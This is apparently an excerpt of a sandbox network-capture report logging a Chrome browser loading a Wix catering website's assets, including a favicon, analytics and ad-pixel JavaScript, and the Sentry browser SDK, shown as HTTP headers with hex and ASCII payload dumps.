                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 75 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 6d 2e 70 61 72 73 65 28 65 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 65 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 65 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 6f 3d 72 2e 77 6f 72 64 73 2c 69 3d 72 2e 73 69 67 42 79 74 65 73 2c 61 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 63 3d 69 2f 28 34 2a 61 29 2c 73 3d 28 63 3d 74 3f
                                                                                                                                                                                                                        Data Ascii: unction(){this._data=new u.init,this._nDataBytes=0},_append:function(e){"string"==typeof e&&(e=m.parse(e)),this._data.concat(e),this._nDataBytes+=e.sigBytes},_process:function(t){var n,r=this._data,o=r.words,i=r.sigBytes,a=this.blockSize,c=i/(4*a),s=(c=t?
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 6f 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 6f 3d 6e 5b 31 5d 2c 69 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33 5d 2c 63 3d 6e 5b 34 5d 2c 6c 3d 6e 5b 35 5d 2c 64 3d 6e 5b 36 5d 2c 70 3d 6e 5b 37 5d 2c 6d 3d 30 3b 6d 3c 36 34 3b 6d 2b 2b 29 7b 69 66 28 6d 3c 31 36 29 75 5b 6d 5d 3d 30 7c 65 5b 74 2b 6d 5d 3b 65 6c 73 65 7b 76 61 72 20 76 3d 75 5b 6d 2d 31 35 5d 2c 66 3d 28 76 3c 3c 32 35 7c 76 3e 3e 3e 37 29 5e 28 76 3c 3c 31 34 7c 76 3e 3e 3e 31 38 29
                                                                                                                                                                                                                        Data Ascii: ({_doReset:function(){this._hash=new o.init(c.slice(0))},_doProcessBlock:function(e,t){for(var n=this._hash.words,r=n[0],o=n[1],i=n[2],a=n[3],c=n[4],l=n[5],d=n[6],p=n[7],m=0;m<64;m++){if(m<16)u[m]=0|e[t+m];else{var v=u[m-15],f=(v<<25|v>>>7)^(v<<14|v>>>18)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 74 7c 7c 22 64 65 66 61 75 6c 74 22 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65 20 76 61 6c 75 65 2e 22 29 7d 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 3f 53 74 72 69 6e 67 3a 4e 75 6d 62 65 72 29 28 65 29 7d 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 2e 64 65 66 61 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 7d 2c 31 37 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 31 31 34 29 2e 64 65 66 61 75 6c 74 2c 6f 3d 6e 28 36 36 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d
                                                                                                                                                                                                                        Data Ascii: t||"default");if("object"!=r(o))return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)},e.exports.__esModule=!0,e.exports.default=e.exports},174:(e,t,n)=>{var r=n(114).default,o=n(662);e.exports=
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 3b 76 61 72 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 72 29 2c 6e 2e 64 28 72 2c 7b 61 70 69 3a 28 29 3d 3e 65 2c 63 68 61 6e 6e 65 6c 4e 61 6d 65 73 3a 28 29 3d 3e 66 65 2c 6c 69 73 74 65 6e 65 72 73 3a 28 29 3d 3e 68 65 7d 29 3b 76 61 72 20 65 3d 7b 7d 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 61 64 64 4c 69 73 74 65 6e 65 72 3a 28 29 3d 3e 49 65 2c 69 6e 69 74 3a 28 29 3d 3e 43 65 2c 74 72 61 63 6b 45 76 65 6e 74 3a 28 29 3d 3e 62 65 2c 74 72 61 63 6b 45 76 65 6e 74 54 6f 43 68 61 6e 6e 65 6c 73 4f 6e 6c 79 3a 28 29 3d 3e 41 65 2c 74 72 61 63 6b 45 76 65 6e 74 54 6f 45
                                                                                                                                                                                                                        Data Ascii: fineProperty(e,"__esModule",{value:!0})};var r={};return(()=>{"use strict";n.r(r),n.d(r,{api:()=>e,channelNames:()=>fe,listeners:()=>he});var e={};n.r(e),n.d(e,{addListener:()=>Ie,init:()=>Ce,trackEvent:()=>be,trackEventToChannelsOnly:()=>Ae,trackEventToE
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 26 72 5b 38 5d 7c 31 32 38 2c 74 29 7b 6e 3d 6e 7c 7c 30 3b 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 31 36 3b 2b 2b 6f 29 74 5b 6e 2b 6f 5d 3d 72 5b 6f 5d 3b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 64 28 72 29 7d 2c 6d 3d 28 65 2c 74 2c 6e 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 7b 2e 2e 2e 6e 2c 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 3a 70 28 29 7d 3b 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 7b 7d 29 3b 63 6f 6e 73 74 7b 61 70 70 44 65 66 49 64 3a 6f 2c 2e 2e 2e 69 7d 3d 6e 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 6e 74 73 3f 28 28 72 3d 72 7c 7c 7b 7d 29 2e 63 6f 6e 66 69 67 3d 74 2e 63 6f 6e 66 69 67 2c 72 2e 63 6f 6e 74 65 78 74
                                                                                                                                                                                                                        Data Ascii: &r[8]|128,t){n=n||0;for(var o=0;o<16;++o)t[n+o]=r[o];return t}return d(r)},m=(e,t,n,r)=>{const o={...n,_internalEventId:p()};e.forEach((e=>{(function(e,t,n,r){void 0===n&&(n={});const{appDefId:o,...i}=n;return t.events?((r=r||{}).config=t.config,r.context
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 73 2f 67 2c 22 22 29 29 2c 63 3d 7b 5b 6e 2e 66 69 72 73 74 5f 6e 61 6d 65 5d 3a 65 3d 3e 69 28 65 29 2c 5b 6e 2e 6c 61 73 74 5f 6e 61 6d 65 5d 3a 65 3d 3e 69 28 65 29 2c 5b 6e 2e 65 6d 61 69 6c 5d 3a 65 3d 3e 65 2e 74 72 69 6d 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 5b 6e 2e 70 68 6f 6e 65 5d 3a 65 3d 3e 28 65 3d 3e 65 2e 74 72 69 6d 28 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 30 2b 2f 2c 22 22 29 29 28 65 29 2c 5b 72 2e 63 69 74 79 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 73 75 62 64 69 76 69 73 69 6f 6e 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 63 6f 75 6e 74 72 79 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 70 6f 73 74 61 6c 43 6f 64 65 5d 3a 65 3d 3e 61 28 65 29 7d 2c 73 3d 65 2e 75 73 65 72 44 61 74
                                                                                                                                                                                                                        Data Ascii: s/g,"")),c={[n.first_name]:e=>i(e),[n.last_name]:e=>i(e),[n.email]:e=>e.trim().toLowerCase(),[n.phone]:e=>(e=>e.trim().replace(/\D/g,"").replace(/^0+/,""))(e),[r.city]:e=>a(e),[r.subdivision]:e=>a(e),[r.country]:e=>a(e),[r.postalCode]:e=>a(e)},s=e.userDat
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 49 28 6e 29 2c 63 6f 6e 74 65 6e 74 5f 69 64 73 3a 5b 74 5d 2c 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3a 22 70 72 6f 64 75 63 74 22 7d 2c 7b 65 76 65 6e 74 49 44 3a 6e 2e 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 7d 5d 5d 7d 2c 49 6e 69 74 69 61 74 65 43 68 65 63 6b 6f 75 74 3a 65 3d 3e 5b 5b 22 74 72 61 63 6b 22 2c 22 49 6e 69 74 69 61 74 65 43 68 65 63 6b 6f 75 74 22 2c 7b 2e 2e 2e 49 28 62 28 65 29 29 2c 2e 2e 2e 65 2e 63 6f 6e 74 65 6e 74 73 26 26 7b 63 6f 6e 74 65 6e 74 5f 69 64 73 3a 65 2e 63 6f 6e 74 65 6e 74 73 2e 6d 61 70 28 28 65 3d 3e 65 2e 69 64 29 29 2c 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3a 22 70 72 6f 64 75 63 74 22 7d 7d 2c 7b 65 76 65 6e 74 49 44 3a 65 2e 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 7d 5d 5d 2c 41 64 64 50 61 79 6d
                                                                                                                                                                                                                        Data Ascii: I(n),content_ids:[t],content_type:"product"},{eventID:n._internalEventId}]]},InitiateCheckout:e=>[["track","InitiateCheckout",{...I(b(e)),...e.contents&&{content_ids:e.contents.map((e=>e.id)),content_type:"product"}},{eventID:e._internalEventId}]],AddPaym


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        89192.168.2.55001634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC607OUTGET /client/pfavico.ico HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1150
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Version-Id: 0x5C7YdGnxYK.Yjl2_U1.5aDaa7h7MJW
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Varnish: 400295744
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        X-Wix-Request-Id: 1726199455.0311244933965121287198
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 17:02:22 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 2580645
                                                                                                                                                                                                                        Last-Modified: Thu, 11 Jan 2024 08:02:26 GMT
                                                                                                                                                                                                                        ETag: "b53ce85a6cce2ae00037a6ca13c90866"
                                                                                                                                                                                                                        Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC227INData Raw: 00 00 01 00 01 00 10 10 00 00 00 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff
                                                                                                                                                                                                                        Data Ascii: h( @
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC923INData Raw: ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01
                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        90192.168.2.550015151.101.66.2174435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC366OUTGET /6.18.2/bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 65254
                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                        Expires: Wed, 22 Oct 2025 22:03:25 GMT
                                                                                                                                                                                                                        Last-Modified: Tue, 08 Mar 2022 14:01:18 GMT
                                                                                                                                                                                                                        ETag: W/"5b6773578af8dd5591339930c2b29024"
                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Age: 806142
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 36 2e 31 38 2e 32 20 28 32 32 66 35 31 38 65 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6e 7d 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29
                                                                                                                                                                                                                        Data Ascii: /*! @sentry/browser 6.18.2 (22f518e) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){var n=function(t,r){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var r in n)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 3d 74 2e 63 6f 6e 63 61 74 28 75 28 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 29 3b 72 65 74 75 72 6e 20 74 7d 74 2e 53 65 76 65 72 69 74 79 3d 76 6f 69 64 20 30 2c 28 69 3d 74 2e 53 65 76 65 72 69 74 79 7c 7c 28 74 2e 53 65 76 65 72 69 74 79 3d 7b 7d 29 29 2e 46 61 74 61 6c 3d 22 66 61 74 61 6c 22 2c 69 2e 45 72 72 6f 72 3d 22 65 72 72 6f 72 22 2c 69 2e 57 61 72 6e 69 6e 67 3d 22 77 61 72 6e 69 6e 67 22 2c 69 2e 4c 6f 67 3d 22 6c 6f 67 22 2c 69 2e 49 6e 66 6f 3d 22 69 6e 66 6f 22 2c 69 2e 44 65 62 75 67 3d 22 64 65 62 75 67 22 2c 69 2e 43 72 69 74 69 63 61 6c 3d 22 63 72 69 74 69 63 61 6c 22 3b 76 61 72 20 63 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b
                                                                                                                                                                                                                        Data Ascii: t=[],n=0;n<arguments.length;n++)t=t.concat(u(arguments[n]));return t}t.Severity=void 0,(i=t.Severity||(t.Severity={})).Fatal="fatal",i.Error="error",i.Warning="warning",i.Log="log",i.Info="info",i.Debug="debug",i.Critical="critical";var c={};function s(){
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 2c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 7d 29 29 3a 6e 75 6c 6c 3b 69 66 28 73 26 26 73 2e 6c 65 6e 67 74 68 29 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 2e 70 75 73 68 28 22 5b 22 2b 74 5b 30 5d 2b 27 3d 22 27 2b 74 5b 31 5d 2b 27 22 5d 27 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 61 2e 69 64 26 26 63 2e 70 75 73 68 28 22 23 22 2b 61 2e 69 64 29 2c 28 72 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 29 26 26 70 28 72 29 29 66 6f 72 28 69 3d 72 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 29 2c 75 3d 30 3b 75 3c 69 2e 6c 65 6e 67 74 68 3b 75 2b 2b
                                                                                                                                                                                                                        Data Ascii: ction(t){return a.getAttribute(t)})).map((function(t){return[t,a.getAttribute(t)]})):null;if(s&&s.length)s.forEach((function(t){c.push("["+t[0]+'="'+t[1]+'"]')}));else if(a.id&&c.push("#"+a.id),(r=a.className)&&p(r))for(i=r.split(/\s+/),u=0;u<i.length;u++
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 3d 72 5b 30 5d 2c 65 3d 72 5b 31 5d 2c 6f 3d 72 5b 32 5d 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 6f 3f 22 22 3a 6f 2c 63 3d 72 5b 33 5d 2c 73 3d 72 5b 34 5d 2c 66 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 22 3a 73 2c 68 3d 22 22 2c 76 3d 72 5b 35 5d 2c 64 3d 76 2e 73 70 6c 69 74 28 22 2f 22 29 3b 69 66 28 64 2e 6c 65 6e 67 74 68 3e 31 26 26 28 68 3d 64 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2e 6a 6f 69 6e 28 22 2f 22 29 2c 76 3d 64 2e 70 6f 70 28 29 29 2c 76 29 7b 76 61 72 20 6c 3d 76 2e 6d 61 74 63 68 28 2f 5e 5c 64 2b 2f 29 3b 6c 26 26 28 76 3d 6c 5b 30 5d 29 7d 72 65 74 75 72 6e 20 54 28 7b 68 6f 73 74 3a 63 2c 70 61 73 73 3a 61 2c 70 61 74 68 3a 68 2c 70 72 6f 6a 65 63 74 49 64 3a 76 2c 70 6f 72 74 3a 66 2c 70 72 6f 74 6f 63 6f 6c 3a 69 2c 70 75 62 6c 69 63 4b
                                                                                                                                                                                                                        Data Ascii: =r[0],e=r[1],o=r[2],a=void 0===o?"":o,c=r[3],s=r[4],f=void 0===s?"":s,h="",v=r[5],d=v.split("/");if(d.length>1&&(h=d.slice(0,-1).join("/"),v=d.pop()),v){var l=v.match(/^\d+/);l&&(v=l[0])}return T({host:c,pass:a,path:h,projectId:v,port:f,protocol:i,publicK
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 65 77 20 71 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 74 29 7b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6e 3d 74 2c 72 3d 6e 5b 30 5d 2e 66 75 6e 63 74 69 6f 6e 7c 7c 22 22 2c 69 3d 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 2e 66 75 6e 63 74 69 6f 6e 7c 7c 22 22 3b 72 65 74 75 72 6e 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 63 61 70 74 75 72 65 4d 65 73 73 61 67 65 22 29 26 26 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 22 29 7c 7c 28 6e 3d 6e 2e 73 6c 69 63 65 28 31 29 29 2c 2d 31 21 3d 3d 69 2e 69 6e 64 65 78 4f 66 28 22 73 65 6e 74 72 79 57 72 61 70 70 65 64 22 29 26 26 28 6e 3d 6e 2e 73 6c 69 63 65 28 30 2c 2d 31 29 29 2c 6e 2e 73 6c 69 63 65 28 30 2c 35 30 29 2e
                                                                                                                                                                                                                        Data Ascii: ew q);function C(t){if(!t.length)return[];var n=t,r=n[0].function||"",i=n[n.length-1].function||"";return-1===r.indexOf("captureMessage")&&-1===r.indexOf("captureException")||(n=n.slice(1)),-1!==i.indexOf("sentryWrapped")&&(n=n.slice(0,-1)),n.slice(0,50).
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 2e 74 61 72 67 65 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 2e 74 61 72 67 65 74 29 7d 63 61 74 63 68 28 74 29 7b 6f 2e 74 61 72 67 65 74 3d 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 7d 74 72 79 7b 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 77 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3f 45 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 7d 63 61 74 63 68 28 74 29 7b 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 7d 66 6f 72 28 76 61 72 20 75 20 69 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                        Data Ascii: .target):Object.prototype.toString.call(e.target)}catch(t){o.target="<unknown>"}try{o.currentTarget=w(e.currentTarget)?E(e.currentTarget):Object.prototype.toString.call(e.currentTarget)}catch(t){o.currentTarget="<unknown>"}for(var u in"undefined"!=typeof
